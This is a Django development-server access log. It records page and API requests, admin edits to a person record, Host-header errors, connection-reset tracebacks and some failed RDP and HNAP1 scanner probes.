[04/Oct/2018 21:23:30] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:23:35] "GET / HTTP/1.1" 200 3345
[04/Oct/2018 21:23:35] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:23:35] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:23:40] "GET / HTTP/1.1" 200 3345
[04/Oct/2018 21:23:40] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:23:40] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:24:11] "GET / HTTP/1.1" 200 3345
[04/Oct/2018 21:24:11] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:24:45] "GET / HTTP/1.1" 200 3345
[04/Oct/2018 21:24:46] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:26:40] "GET / HTTP/1.1" 200 3350
[04/Oct/2018 21:26:40] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:27:05] "GET / HTTP/1.1" 200 3352
[04/Oct/2018 21:27:05] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:27:11] "GET / HTTP/1.1" 200 3352
[04/Oct/2018 21:27:12] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:27:16] "GET / HTTP/1.1" 200 3352
[04/Oct/2018 21:27:16] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:33:47] "GET / HTTP/1.1" 200 3349
[04/Oct/2018 21:33:47] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:34:12] "GET / HTTP/1.1" 200 3350
[04/Oct/2018 21:34:12] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:34:17] "GET / HTTP/1.1" 200 3350
[04/Oct/2018 21:34:17] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:34:31] "GET / HTTP/1.1" 200 3350
[04/Oct/2018 21:34:31] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:34:36] "GET / HTTP/1.1" 200 3350
[04/Oct/2018 21:34:37] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:35:16] "GET / HTTP/1.1" 200 3350
[04/Oct/2018 21:35:16] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:35:28] "GET / HTTP/1.1" 200 3350
[04/Oct/2018 21:35:28] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:35:31] "GET / HTTP/1.1" 200 3350
[04/Oct/2018 21:35:31] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:35:31] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:35:35] "GET / HTTP/1.1" 200 3350
[04/Oct/2018 21:35:35] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:35:35] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:38:13] "GET / HTTP/1.1" 200 3370
[04/Oct/2018 21:38:13] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:38:13] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:38:51] "GET / HTTP/1.1" 200 3372
[04/Oct/2018 21:38:51] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:38:51] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:38:59] "GET / HTTP/1.1" 200 3372
[04/Oct/2018 21:38:59] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:38:59] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:39:15] "GET / HTTP/1.1" 200 3372
[04/Oct/2018 21:39:17] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:39:46] "GET / HTTP/1.1" 200 3372
[04/Oct/2018 21:39:46] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:39:46] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:39:53] "GET / HTTP/1.1" 200 3372
[04/Oct/2018 21:39:53] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:39:53] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:41:44] "GET / HTTP/1.1" 200 3372
[04/Oct/2018 21:41:44] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:41:45] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:41:54] "GET / HTTP/1.1" 200 3372
[04/Oct/2018 21:41:54] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:41:54] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:42:10] "GET / HTTP/1.1" 200 3372
[04/Oct/2018 21:42:11] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:42:26] "GET / HTTP/1.1" 200 3372
[04/Oct/2018 21:42:26] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:42:26] "GET /api/person/1/ HTTP/1.1" 200 281
[04/Oct/2018 21:43:03] "GET /admin HTTP/1.1" 301 0
[04/Oct/2018 21:43:03] "GET /admin/ HTTP/1.1" 302 0
[04/Oct/2018 21:43:03] "GET /admin/login/?next=/admin/ HTTP/1.1" 200 1819
[04/Oct/2018 21:43:04] "GET /static/admin/css/base.css HTTP/1.1" 304 0
[04/Oct/2018 21:43:04] "GET /static/admin/css/responsive.css HTTP/1.1" 304 0
[04/Oct/2018 21:43:04] "GET /static/admin/css/login.css HTTP/1.1" 200 1203
[04/Oct/2018 21:43:04] "GET /static/admin/css/fonts.css HTTP/1.1" 304 0
[04/Oct/2018 21:43:04] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.1" 304 0
[04/Oct/2018 21:43:04] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.1" 304 0
[04/Oct/2018 21:43:08] "POST /admin/login/?next=/admin/ HTTP/1.1" 302 0
[04/Oct/2018 21:43:09] "GET /admin/ HTTP/1.1" 200 4319
[04/Oct/2018 21:43:09] "GET /static/admin/css/dashboard.css HTTP/1.1" 304 0
[04/Oct/2018 21:43:09] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.1" 304 0
[04/Oct/2018 21:43:09] "GET /static/admin/img/icon-addlink.svg HTTP/1.1" 304 0
[04/Oct/2018 21:43:09] "GET /static/admin/img/icon-changelink.svg HTTP/1.1" 304 0
[04/Oct/2018 21:43:14] "GET /admin/api/person/ HTTP/1.1" 200 4329
[04/Oct/2018 21:43:15] "GET /static/admin/css/changelists.css HTTP/1.1" 304 0
[04/Oct/2018 21:43:15] "GET /static/admin/js/vendor/jquery/jquery.js HTTP/1.1" 304 0
[04/Oct/2018 21:43:15] "GET /static/admin/js/jquery.init.js HTTP/1.1" 304 0
[04/Oct/2018 21:43:15] "GET /admin/jsi18n/ HTTP/1.1" 200 3185
[04/Oct/2018 21:43:15] "GET /static/admin/js/core.js HTTP/1.1" 304 0
[04/Oct/2018 21:43:15] "GET /static/admin/js/admin/RelatedObjectLookups.js HTTP/1.1" 304 0
[04/Oct/2018 21:43:15] "GET /static/admin/js/actions.js HTTP/1.1" 304 0
[04/Oct/2018 21:43:15] "GET /static/admin/js/vendor/xregexp/xregexp.js HTTP/1.1" 304 0
[04/Oct/2018 21:43:15] "GET /static/admin/js/urlify.js HTTP/1.1" 304 0
[04/Oct/2018 21:43:15] "GET /static/admin/js/prepopulate.js HTTP/1.1" 304 0
[04/Oct/2018 21:43:15] "GET /static/admin/img/tooltag-add.svg HTTP/1.1" 304 0
[04/Oct/2018 21:43:18] "GET /admin/api/person/1/change/ HTTP/1.1" 200 6823
[04/Oct/2018 21:43:18] "GET /static/admin/css/forms.css HTTP/1.1" 304 0
[04/Oct/2018 21:43:18] "GET /admin/jsi18n/ HTTP/1.1" 200 3185
[04/Oct/2018 21:43:18] "GET /static/admin/js/change_form.js HTTP/1.1" 304 0
[04/Oct/2018 21:43:18] "GET /static/admin/js/prepopulate_init.js HTTP/1.1" 304 0
[04/Oct/2018 21:43:18] "GET /static/admin/css/widgets.css HTTP/1.1" 304 0
[04/Oct/2018 21:43:35] "POST /admin/api/person/1/change/ HTTP/1.1" 302 0
[04/Oct/2018 21:43:35] "GET /admin/api/person/ HTTP/1.1" 200 4519
[04/Oct/2018 21:43:35] "GET /admin/jsi18n/ HTTP/1.1" 200 3185
[04/Oct/2018 21:43:36] "GET /static/admin/img/icon-yes.svg HTTP/1.1" 304 0
[04/Oct/2018 21:43:41] "GET / HTTP/1.1" 200 3372
[04/Oct/2018 21:43:41] "GET /api/person/1/ HTTP/1.1" 200 285
[04/Oct/2018 21:43:41] "GET /api/person/1/ HTTP/1.1" 200 285
[04/Oct/2018 21:43:55] "GET / HTTP/1.1" 200 3372
[04/Oct/2018 21:43:56] "GET /api/person/1/ HTTP/1.1" 200 285
[04/Oct/2018 21:44:02] "GET / HTTP/1.1" 200 3372
[04/Oct/2018 21:44:02] "GET /api/person/1/ HTTP/1.1" 200 285
[04/Oct/2018 21:45:24] "GET / HTTP/1.1" 200 3464
[04/Oct/2018 21:45:25] "GET /api/person/1/ HTTP/1.1" 200 285
[04/Oct/2018 21:46:25] "GET /image.jpg HTTP/1.1" 200 44969
[04/Oct/2018 22:08:27] "GET / HTTP/1.1" 200 3464
[04/Oct/2018 22:08:28] "GET /api/person/1/ HTTP/1.1" 200 285
Not Found: /favicon.ico
[04/Oct/2018 22:08:28] "GET /favicon.ico HTTP/1.1" 404 2550
[04/Oct/2018 22:12:03] "GET / HTTP/1.1" 200 3464
[04/Oct/2018 22:12:03] "GET /api/person/1/ HTTP/1.1" 200 285
[04/Oct/2018 22:13:05] "GET / HTTP/1.1" 200 3464
[04/Oct/2018 22:13:06] "GET /api/person/1/ HTTP/1.1" 200 285
Not Found: /favicon.ico
[04/Oct/2018 22:13:06] "GET /favicon.ico HTTP/1.1" 404 2550
[04/Oct/2018 22:14:45] "GET / HTTP/1.1" 200 3464
[04/Oct/2018 22:14:46] "GET /api/person/1/ HTTP/1.1" 200 285
Not Found: /index.html
[04/Oct/2018 22:14:49] "GET /index.html HTTP/1.1" 404 2547
[04/Oct/2018 22:15:05] "GET / HTTP/1.1" 200 3464
[04/Oct/2018 22:16:01] "GET / HTTP/1.1" 200 3464
[04/Oct/2018 22:16:01] "GET /api/person/1/ HTTP/1.1" 200 285
[04/Oct/2018 22:22:56] "GET / HTTP/1.1" 200 3464
[04/Oct/2018 22:22:57] "GET /api/person/1/ HTTP/1.1" 200 285
[04/Oct/2018 23:24:04] "GET / HTTP/1.1" 200 3464
[04/Oct/2018 23:48:01] "GET /api/person/1/ HTTP/1.1" 200 285
[05/Oct/2018 01:41:26] "GET / HTTP/1.1" 200 3464
[05/Oct/2018 01:41:27] "GET /api/person/1/ HTTP/1.1" 200 285
Not Found: /favicon.ico
[05/Oct/2018 01:41:27] "GET /favicon.ico HTTP/1.1" 404 2550
[05/Oct/2018 01:44:00] "GET / HTTP/1.1" 200 3464
[05/Oct/2018 01:44:00] "GET /api/person/1/ HTTP/1.1" 200 285
[05/Oct/2018 01:44:21] "GET /api/person/1/ HTTP/1.1" 200 285
[05/Oct/2018 01:44:46] "GET / HTTP/1.1" 200 3464
[05/Oct/2018 01:44:47] "GET /api/person/1/ HTTP/1.1" 200 285
[05/Oct/2018 02:36:42] "GET / HTTP/1.1" 200 3464
[05/Oct/2018 02:36:43] "GET /api/person/1/ HTTP/1.1" 200 285
[05/Oct/2018 02:36:50] "GET / HTTP/1.1" 200 3464
[05/Oct/2018 02:36:51] "GET /api/person/1/ HTTP/1.1" 200 285
[05/Oct/2018 02:36:57] "GET / HTTP/1.1" 200 3464
[05/Oct/2018 02:36:57] "GET /api/person/1/ HTTP/1.1" 200 285
[05/Oct/2018 02:50:22] "GET / HTTP/1.1" 200 3467
[05/Oct/2018 02:50:23] "GET /api/person/1/ HTTP/1.1" 200 285
[05/Oct/2018 02:50:48] "GET / HTTP/1.1" 200 3467
[05/Oct/2018 02:50:49] "GET /api/person/1/ HTTP/1.1" 200 285
[05/Oct/2018 02:53:16] "GET / HTTP/1.1" 200 3470
[05/Oct/2018 02:53:16] "GET /api/person/1/ HTTP/1.1" 200 285
[05/Oct/2018 02:53:17] "GET / HTTP/1.1" 200 3470
[05/Oct/2018 02:53:17] "GET /api/person/1/ HTTP/1.1" 200 285
[05/Oct/2018 02:56:52] "GET / HTTP/1.1" 200 3470
[05/Oct/2018 02:56:53] "GET /api/person/1/ HTTP/1.1" 200 285
[05/Oct/2018 02:59:09] "GET / HTTP/1.1" 200 3464
[05/Oct/2018 02:59:10] "GET /api/person/1/ HTTP/1.1" 200 285
[05/Oct/2018 02:59:25] "GET / HTTP/1.1" 200 3464
[05/Oct/2018 02:59:26] "GET /api/person/1/ HTTP/1.1" 200 285
[05/Oct/2018 03:01:48] "GET /admin/ HTTP/1.1" 200 4614
[05/Oct/2018 03:01:50] "GET /admin/api/person/ HTTP/1.1" 200 4329
[05/Oct/2018 03:01:50] "GET /admin/jsi18n/ HTTP/1.1" 200 3185
[05/Oct/2018 03:01:52] "GET /admin/api/person/1/change/ HTTP/1.1" 200 6831
[05/Oct/2018 03:01:52] "GET /admin/jsi18n/ HTTP/1.1" 200 3185
[05/Oct/2018 03:02:01] "POST /admin/api/person/1/change/ HTTP/1.1" 302 0
[05/Oct/2018 03:02:01] "GET /admin/api/person/ HTTP/1.1" 200 4519
[05/Oct/2018 03:02:01] "GET /admin/jsi18n/ HTTP/1.1" 200 3185
[05/Oct/2018 03:02:03] "GET /admin/api/person/1/change/ HTTP/1.1" 200 6832
[05/Oct/2018 03:02:03] "GET /admin/jsi18n/ HTTP/1.1" 200 3185
[05/Oct/2018 03:02:05] "GET / HTTP/1.1" 200 3464
[05/Oct/2018 03:02:06] "GET /api/person/1/ HTTP/1.1" 200 287
[05/Oct/2018 03:02:21] "POST /admin/api/person/1/change/ HTTP/1.1" 302 0
[05/Oct/2018 03:02:21] "GET /admin/api/person/1/change/ HTTP/1.1" 200 7051
[05/Oct/2018 03:02:21] "GET /admin/jsi18n/ HTTP/1.1" 200 3185
[05/Oct/2018 03:02:24] "GET / HTTP/1.1" 200 3464
[05/Oct/2018 03:02:24] "GET /api/person/1/ HTTP/1.1" 200 288
[05/Oct/2018 03:02:36] "POST /admin/api/person/1/change/ HTTP/1.1" 302 0
[05/Oct/2018 03:02:36] "GET /admin/api/person/1/change/ HTTP/1.1" 200 7053
[05/Oct/2018 03:02:36] "GET /admin/jsi18n/ HTTP/1.1" 200 3185
[05/Oct/2018 03:02:38] "GET / HTTP/1.1" 200 3464
[05/Oct/2018 03:02:39] "GET /api/person/1/ HTTP/1.1" 200 292
[05/Oct/2018 03:03:01] "POST /admin/api/person/1/change/ HTTP/1.1" 302 0
[05/Oct/2018 03:03:02] "GET /admin/api/person/add/ HTTP/1.1" 200 6666
[05/Oct/2018 03:03:02] "GET /admin/jsi18n/ HTTP/1.1" 200 3185
[05/Oct/2018 03:03:11] "GET /admin/api/person/1/change/ HTTP/1.1" 200 6831
[05/Oct/2018 03:03:11] "GET /admin/jsi18n/ HTTP/1.1" 200 3185
[05/Oct/2018 03:03:12] "GET / HTTP/1.1" 200 3464
[05/Oct/2018 03:03:13] "GET /api/person/1/ HTTP/1.1" 200 285
[05/Oct/2018 03:08:18] "GET / HTTP/1.1" 200 3464
[05/Oct/2018 03:08:19] "GET /api/person/1/ HTTP/1.1" 200 285
[05/Oct/2018 04:44:45] "GET / HTTP/1.1" 200 3464
[05/Oct/2018 04:44:45] "GET /api/person/1/ HTTP/1.1" 200 285
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[05/Oct/2018 15:34:52] "GET / HTTP/1.0" 400 60178
[05/Oct/2018 15:35:21] "GET /api HTTP/1.1" 301 0
[05/Oct/2018 15:35:21] "GET /api/ HTTP/1.1" 200 5322
[05/Oct/2018 15:35:21] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.1" 200 3385
[05/Oct/2018 15:35:21] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.1" 200 121200
[05/Oct/2018 15:35:21] "GET /static/rest_framework/css/prettify.css HTTP/1.1" 200 817
[05/Oct/2018 15:35:21] "GET /static/rest_framework/css/default.css HTTP/1.1" 200 1131
[05/Oct/2018 15:35:21] "GET /static/rest_framework/js/jquery-3.3.1.min.js HTTP/1.1" 200 86927
[05/Oct/2018 15:35:21] "GET /static/rest_framework/js/ajax-form.js HTTP/1.1" 200 3597
[05/Oct/2018 15:35:21] "GET /static/rest_framework/js/csrf.js HTTP/1.1" 200 1735
[05/Oct/2018 15:35:21] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.1" 200 37045
[05/Oct/2018 15:35:21] "GET /static/rest_framework/js/prettify-min.js HTTP/1.1" 200 13632
[05/Oct/2018 15:35:21] "GET /static/rest_framework/js/default.js HTTP/1.1" 200 1262
[05/Oct/2018 15:35:21] "GET /static/rest_framework/img/grid.png HTTP/1.1" 200 1458
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[05/Oct/2018 15:39:42] "GET / HTTP/1.0" 400 60182
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[05/Oct/2018 15:41:56] "GET / HTTP/1.0" 400 60180
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[05/Oct/2018 15:46:09] "GET / HTTP/1.0" 400 60181
[05/Oct/2018 17:54:13] "GET / HTTP/1.1" 200 3464
[05/Oct/2018 17:54:14] "GET /api/person/1/ HTTP/1.1" 200 285
[05/Oct/2018 22:11:46] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[05/Oct/2018 22:11:46] "  /*à     Cookie: mstshash=Administr" 400 -
[05/Oct/2018 22:33:25] "GET / HTTP/1.1" 200 3464
Traceback (most recent call last):
  File "/usr/lib/python3.5/socketserver.py", line 625, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.5/socketserver.py", line 354, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.5/socketserver.py", line 681, in __init__
    self.handle()
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/core/servers/basehttp.py", line 139, in handle
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.5/socket.py", line 575, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
[06/Oct/2018 16:02:43] "GET / HTTP/1.1" 200 3464
Not Found: /HNAP1/
[06/Oct/2018 16:02:43] "GET /HNAP1/ HTTP/1.1" 404 2535
Not Found: /favicon.ico
[06/Oct/2018 20:01:23] "GET /favicon.ico HTTP/1.1" 404 2550
[07/Oct/2018 00:21:47] "GET / HTTP/1.1" 200 3464
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[07/Oct/2018 07:54:32] "GET / HTTP/1.0" 400 60182
Not Found: /status
[07/Oct/2018 13:00:51] "GET /status HTTP/1.1" 404 2535
[07/Oct/2018 13:03:04] "GET / HTTP/1.1" 200 3464
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[07/Oct/2018 18:33:39] "GET / HTTP/1.0" 400 60180
[08/Oct/2018 01:43:41] "GET / HTTP/1.1" 200 3464
Not Found: /favicon.ico
[08/Oct/2018 01:43:44] "GET /api/person/1/ HTTP/1.1" 200 285
[08/Oct/2018 01:43:44] "GET /favicon.ico HTTP/1.1" 404 2550
[08/Oct/2018 05:36:10] "GET / HTTP/1.1" 200 3464
[08/Oct/2018 05:36:11] "GET /api/person/1/ HTTP/1.1" 200 285
[08/Oct/2018 05:36:16] "GET / HTTP/1.1" 200 3464
[08/Oct/2018 05:36:17] "GET /api/person/1/ HTTP/1.1" 200 285
[08/Oct/2018 08:30:54] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[08/Oct/2018 08:30:54] "  /*à     Cookie: mstshash=Administr" 400 -
[08/Oct/2018 10:02:11] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00+&à\x00\x00\x00\x00\x00Cookie:')
[08/Oct/2018 10:02:11] "  +&à     Cookie: mstshash=hello" 400 -
[08/Oct/2018 15:54:41] "GET / HTTP/1.1" 200 3464
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[08/Oct/2018 16:02:29] "GET / HTTP/1.1" 400 60182
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[08/Oct/2018 16:30:07] "GET / HTTP/1.0" 400 60181
[08/Oct/2018 17:36:05] code 400, message Bad HTTP/0.9 request type ('\x00\x00\x00')
[08/Oct/2018 17:36:05] "    c                           " 400 -
[08/Oct/2018 19:50:55] "GET / HTTP/1.1" 200 3464
[08/Oct/2018 19:50:55] "GET /api/person/1/ HTTP/1.1" 200 285
[08/Oct/2018 21:55:18] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00+&à\x00\x00\x00\x00\x00Cookie:')
[08/Oct/2018 21:55:18] "  +&à     Cookie: mstshash=hello" 400 -
[09/Oct/2018 01:33:43] code 400, message Bad HTTP/0.9 request type ('\x00\x00\x00')
[09/Oct/2018 01:33:43] "    c                           " 400 -
[09/Oct/2018 01:44:33] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00+&à\x00\x00\x00\x00\x00Cookie:')
[09/Oct/2018 01:44:33] "  +&à     Cookie: mstshash=hello" 400 -
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[09/Oct/2018 02:42:14] "GET / HTTP/1.0" 400 60180
Traceback (most recent call last):
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 279, in write
    self._write(data)
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 463, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.5/socket.py", line 593, in write
    return self._sock.send(b)
ConnectionResetError: [Errno 104] Connection reset by peer
[09/Oct/2018 02:42:14] "GET / HTTP/1.0" 500 59
Traceback (most recent call last):
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 279, in write
    self._write(data)
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 463, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.5/socket.py", line 593, in write
    return self._sock.send(b)
ConnectionResetError: [Errno 104] Connection reset by peer

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 141, in run
    self.handle_error()
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/core/servers/basehttp.py", line 86, in handle_error
    super().handle_error()
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 368, in handle_error
    self.finish_response()
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 331, in send_headers
    if not self.origin_server or self.client_is_modern():
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 344, in client_is_modern
    return self.environ['SERVER_PROTOCOL'].upper() != 'HTTP/0.9'
TypeError: 'NoneType' object is not subscriptable

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.5/socketserver.py", line 625, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.5/socketserver.py", line 354, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.5/socketserver.py", line 681, in __init__
    self.handle()
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/core/servers/basehttp.py", line 154, in handle
    handler.run(self.server.get_app())
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 144, in run
    self.close()
  File "/usr/lib/python3.5/wsgiref/simple_server.py", line 36, in close
    self.status.split(' ',1)[0], self.bytes_sent
AttributeError: 'NoneType' object has no attribute 'split'
[09/Oct/2018 13:03:03] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[09/Oct/2018 13:03:03] "  /*à     Cookie: mstshash=Administr" 400 -
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[09/Oct/2018 16:26:46] "GET / HTTP/1.0" 400 60182
Not Found: /status
[09/Oct/2018 17:15:58] "GET /status HTTP/1.1" 404 2535
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[09/Oct/2018 22:16:40] "GET / HTTP/1.0" 400 60182
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[10/Oct/2018 07:51:11] "GET / HTTP/1.0" 400 60180
[10/Oct/2018 19:39:39] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[10/Oct/2018 19:39:39] "  /*à     Cookie: mstshash=Administr" 400 -
[10/Oct/2018 20:21:34] "GET / HTTP/1.1" 200 3464
[10/Oct/2018 20:40:24] "GET / HTTP/1.1" 200 3464
[11/Oct/2018 19:14:27] "GET / HTTP/1.1" 200 3464
Not Found: /favicon.ico
[11/Oct/2018 19:14:28] "GET /favicon.ico HTTP/1.1" 404 2550
[11/Oct/2018 19:14:28] "GET /api/person/1/ HTTP/1.1" 200 285
[11/Oct/2018 19:14:31] "GET /admin/ HTTP/1.1" 200 5794
[11/Oct/2018 19:14:32] "GET /static/admin/css/base.css HTTP/1.1" 200 16225
[11/Oct/2018 19:14:32] "GET /static/admin/css/responsive.css HTTP/1.1" 200 17976
[11/Oct/2018 19:14:32] "GET /static/admin/css/dashboard.css HTTP/1.1" 200 412
[11/Oct/2018 19:14:32] "GET /static/admin/css/fonts.css HTTP/1.1" 200 423
[11/Oct/2018 19:14:32] "GET /static/admin/img/icon-addlink.svg HTTP/1.1" 200 331
[11/Oct/2018 19:14:32] "GET /static/admin/img/icon-changelink.svg HTTP/1.1" 200 380
[11/Oct/2018 19:14:32] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.1" 200 82564
[11/Oct/2018 19:14:32] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.1" 200 81348
[11/Oct/2018 19:14:32] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.1" 200 80304
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[11/Oct/2018 21:39:58] "GET / HTTP/1.0" 400 60182
[12/Oct/2018 00:27:43] "GET / HTTP/1.1" 200 3464
[12/Oct/2018 00:27:44] "GET /api/person/1/ HTTP/1.1" 200 285
[12/Oct/2018 01:22:42] "GET / HTTP/1.1" 200 3464
[12/Oct/2018 02:46:04] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[12/Oct/2018 02:46:04] "  /*à     Cookie: mstshash=Administr" 400 -
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[12/Oct/2018 05:54:42] "GET / HTTP/1.0" 400 60181
[12/Oct/2018 14:48:56] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[12/Oct/2018 14:48:56] "  /*à     Cookie: mstshash=Administr" 400 -
Traceback (most recent call last):
  File "/usr/lib/python3.5/socketserver.py", line 625, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.5/socketserver.py", line 354, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.5/socketserver.py", line 681, in __init__
    self.handle()
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/core/servers/basehttp.py", line 139, in handle
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.5/socket.py", line 575, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
[12/Oct/2018 17:19:07] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00*%à\x00\x00\x00\x00\x00Cookie:')
[12/Oct/2018 17:19:07] "  *%à     Cookie: mstshash=Test" 400 -
[12/Oct/2018 17:19:08] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00*%à\x00\x00\x00\x00\x00Cookie:')
[12/Oct/2018 17:19:08] "  *%à     Cookie: mstshash=Test" 400 -
[12/Oct/2018 19:17:48] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[12/Oct/2018 19:17:48] "  /*à     Cookie: mstshash=Administr" 400 -
[12/Oct/2018 20:38:49] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[12/Oct/2018 20:38:49] "  /*à     Cookie: mstshash=Administr" 400 -
Traceback (most recent call last):
